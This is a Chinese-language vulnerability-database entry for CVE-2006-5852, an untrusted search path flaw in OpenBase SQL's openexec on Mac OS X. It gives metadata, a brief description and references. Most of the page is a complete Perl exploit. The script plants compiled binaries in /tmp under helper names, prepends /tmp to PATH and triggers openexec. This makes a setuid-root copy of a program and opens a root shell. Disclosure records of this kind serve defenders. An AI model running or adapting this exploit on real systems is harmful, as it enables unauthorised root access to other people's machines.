OpenBase SQL openexec 不信任搜索路径漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111498 漏洞类型 未知
发布时间 2006-11-08 更新时间 2006-11-09
CVE编号 CVE-2006-5852 CNNVD-ID CNNVD-200611-172
漏洞平台 OSX CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/2738
https://www.securityfocus.com/bid/87375
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-172
|漏洞详情
OpenBaseSQL中的openexec存在不信任搜索路径漏洞,本地用户可以通过引用恶意帮助二进制元的修改过的PATH来获取权限,如通过(1)cp,(2)rm和(3)killall。
|漏洞EXP
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# <= ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# This is some fairly blatant and retarded use of system()
#
# cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm can you cay system() !
# -restart -MachLaunch -launch -noexit -install_plugins -kill -install -uninstall and -deactivate all
# *may* be used to trigger these issues.
#
# I don't feel like seeing which flags call which binaries... just 3 is plenty to prove the point.
#
# Tested against OpenBase10.0.0_MacOSX.dmg

$binpath = "/Library/OpenBase/bin/openexec"; # Typical location.

$tgts{"0"} = "cp:$binpath -install";
$tgts{"1"} = "killall:$binpath -kill";
$tgts{"2"} = "rm:$binpath -uninstall";

unless (($target) = @ARGV) {
       print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/\:/,$tgts{"$key"});
               print "\t$key . $a - $b\n";
       }

       print "\n";
       exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a - $b\n";

open(OP,">/tmp/finisterre.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"chown root: /tmp/pwns ; chmod 4775 /tmp/pwns\"); }\n";

open(OP,">/tmp/pwns.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";

system("gcc -o /tmp/finisterre /tmp/finisterre.c");
system("gcc -o /tmp/pwns /tmp/pwns.c");

system("echo /bin/cp /tmp/finisterre /tmp/$a");
system("/bin/cp /tmp/finisterre /tmp/$a");

system("export PATH=/tmp:\$PATH; $b");
system("/tmp/pwns");

# milw0rm.com [2006-11-08]
|受影响的产品
Openbase International Ltd Openbase 9.1.5 Mac Os X Openbase International Ltd Openbase 8.0.4 Mac Os X Openbase International Ltd Openbase 7.0.15 Mac Os X Openbase International Ltd Openbase 10.0 Mac Os X
|参考资料

来源:MILW0RM
名称:2738
链接:http://www.milw0rm.com/exploits/2738
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2006-1107a%5D.txt
来源:SECUNIA
名称:22742
链接:http://secunia.com/advisories/22742
来源:FULLDISC
名称:20081108[Full-disclosure]OpenBaseSQLmultiplevulnerabilitiesPartDeux
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=116296717330758&w=2
来源:VUPEN
名称:ADV-2006-4404
链接:http://www.frsirt.com/english/advisories/2006/4404
来源:MILW0RM
名称:2738
链接:http://milw0rm.com/exploits/2738